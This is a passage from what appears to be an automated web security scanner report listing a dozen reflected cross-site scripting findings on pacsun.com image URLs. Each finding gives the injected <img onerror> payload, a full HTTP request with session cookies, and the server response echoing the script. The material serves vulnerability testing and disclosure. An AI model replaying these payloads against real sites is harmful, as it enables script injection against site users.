User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:55 GMT
Connection: close

Unable to find /pacsunproducts/8643207_0179048<img src=a onerror=alert(1)>749ccefca97

3.187. http://images3.pacsun.com/is/image/pacsunproducts/8660490_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8660490_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ecb0e<img%20src%3da%20onerror%3dalert(1)>6e752a7b23e was submitted in the REST URL parameter 4. This input was echoed as ecb0e<img src=a onerror=alert(1)>6e752a7b23e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8660490_01ecb0e<img%20src%3da%20onerror%3dalert(1)>6e752a7b23e?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:13 GMT
Connection: close

Unable to find /pacsunproducts/8660490_01ecb0e<img src=a onerror=alert(1)>6e752a7b23e

3.188. http://images3.pacsun.com/is/image/pacsunproducts/8661019_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8661019_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f991d<img%20src%3da%20onerror%3dalert(1)>ef4f0d284ae was submitted in the REST URL parameter 4. This input was echoed as f991d<img src=a onerror=alert(1)>ef4f0d284ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8661019_01f991d<img%20src%3da%20onerror%3dalert(1)>ef4f0d284ae?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:56 GMT
Connection: close

Unable to find /pacsunproducts/8661019_01f991d<img src=a onerror=alert(1)>ef4f0d284ae

3.189. http://images3.pacsun.com/is/image/pacsunproducts/8670820_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8670820_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cf79c<img%20src%3da%20onerror%3dalert(1)>98a86016311 was submitted in the REST URL parameter 4. This input was echoed as cf79c<img src=a onerror=alert(1)>98a86016311 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8670820_01cf79c<img%20src%3da%20onerror%3dalert(1)>98a86016311?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/8670820_01cf79c<img src=a onerror=alert(1)>98a86016311

3.190. http://images3.pacsun.com/is/image/pacsunproducts/8684037_01_041 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8684037_01_041

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bb496<img%20src%3da%20onerror%3dalert(1)>b68810f499d was submitted in the REST URL parameter 4. This input was echoed as bb496<img src=a onerror=alert(1)>b68810f499d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8684037_01_041bb496<img%20src%3da%20onerror%3dalert(1)>b68810f499d?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:09 GMT
Connection: close

Unable to find /pacsunproducts/8684037_01_041bb496<img src=a onerror=alert(1)>b68810f499d

3.191. http://images3.pacsun.com/is/image/pacsunproducts/8684037_sw_003 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8684037_sw_003

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ebf0a<img%20src%3da%20onerror%3dalert(1)>215758b8353 was submitted in the REST URL parameter 4. This input was echoed as ebf0a<img src=a onerror=alert(1)>215758b8353 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8684037_sw_003ebf0a<img%20src%3da%20onerror%3dalert(1)>215758b8353?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:07 GMT
Connection: close

Unable to find /pacsunproducts/8684037_sw_003ebf0a<img src=a onerror=alert(1)>215758b8353

3.192. http://images3.pacsun.com/is/image/pacsunproducts/8684037_sw_041 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8684037_sw_041

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 279ba<img%20src%3da%20onerror%3dalert(1)>f05e9a6a80c was submitted in the REST URL parameter 4. This input was echoed as 279ba<img src=a onerror=alert(1)>f05e9a6a80c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8684037_sw_041279ba<img%20src%3da%20onerror%3dalert(1)>f05e9a6a80c?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:07 GMT
Connection: close

Unable to find /pacsunproducts/8684037_sw_041279ba<img src=a onerror=alert(1)>f05e9a6a80c

3.193. http://images3.pacsun.com/is/image/pacsunproducts/8700825_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8700825_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bc6a6<img%20src%3da%20onerror%3dalert(1)>4a4a7d81d25 was submitted in the REST URL parameter 4. This input was echoed as bc6a6<img src=a onerror=alert(1)>4a4a7d81d25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8700825_01bc6a6<img%20src%3da%20onerror%3dalert(1)>4a4a7d81d25?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:22 GMT
Connection: close

Unable to find /pacsunproducts/8700825_01bc6a6<img src=a onerror=alert(1)>4a4a7d81d25

3.194. http://images3.pacsun.com/is/image/pacsunproducts/8705493_01_209 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8705493_01_209

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bc3da<img%20src%3da%20onerror%3dalert(1)>ab65d9a1107 was submitted in the REST URL parameter 4. This input was echoed as bc3da<img src=a onerror=alert(1)>ab65d9a1107 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8705493_01_209bc3da<img%20src%3da%20onerror%3dalert(1)>ab65d9a1107?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:23 GMT
Connection: close

Unable to find /pacsunproducts/8705493_01_209bc3da<img src=a onerror=alert(1)>ab65d9a1107

3.195. http://images3.pacsun.com/is/image/pacsunproducts/8706152_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8706152_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 432c1<img%20src%3da%20onerror%3dalert(1)>8ef55fb9c1d was submitted in the REST URL parameter 4. This input was echoed as 432c1<img src=a onerror=alert(1)>8ef55fb9c1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8706152_01432c1<img%20src%3da%20onerror%3dalert(1)>8ef55fb9c1d?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:13 GMT
Connection: close

Unable to find /pacsunproducts/8706152_01432c1<img src=a onerror=alert(1)>8ef55fb9c1d

3.196. http://images3.pacsun.com/is/image/pacsunproducts/8710600_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8710600_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 278a0<img%20src%3da%20onerror%3dalert(1)>88b38d4e150 was submitted in the REST URL parameter 4. This input was echoed as 278a0<img src=a onerror=alert(1)>88b38d4e150 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8710600_01278a0<img%20src%3da%20onerror%3dalert(1)>88b38d4e150?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:23 GMT
Connection: close

Unable to find /pacsunproducts/8710600_01278a0<img src=a onerror=alert(1)>88b38d4e150

3.197. http://images3.pacsun.com/is/image/pacsunproducts/8714529_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8714529_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1ecaf<img%20src%3da%20onerror%3dalert(1)>288b53e1a07 was submitted in the REST URL parameter 4. This input was echoed as 1ecaf<img src=a onerror=alert(1)>288b53e1a07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8714529_011ecaf<img%20src%3da%20onerror%3dalert(1)>288b53e1a07?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:55 GMT
Connection: close

Unable to find /pacsunproducts/8714529_011ecaf<img src=a onerror=alert(1)>288b53e1a07

3.198. http://images3.pacsun.com/is/image/pacsunproducts/8728248_01_046 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8728248_01_046

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 905c2<img%20src%3da%20onerror%3dalert(1)>a7b33374ab3 was submitted in the REST URL parameter 4. This input was echoed as 905c2<img src=a onerror=alert(1)>a7b33374ab3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8728248_01_046905c2<img%20src%3da%20onerror%3dalert(1)>a7b33374ab3?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
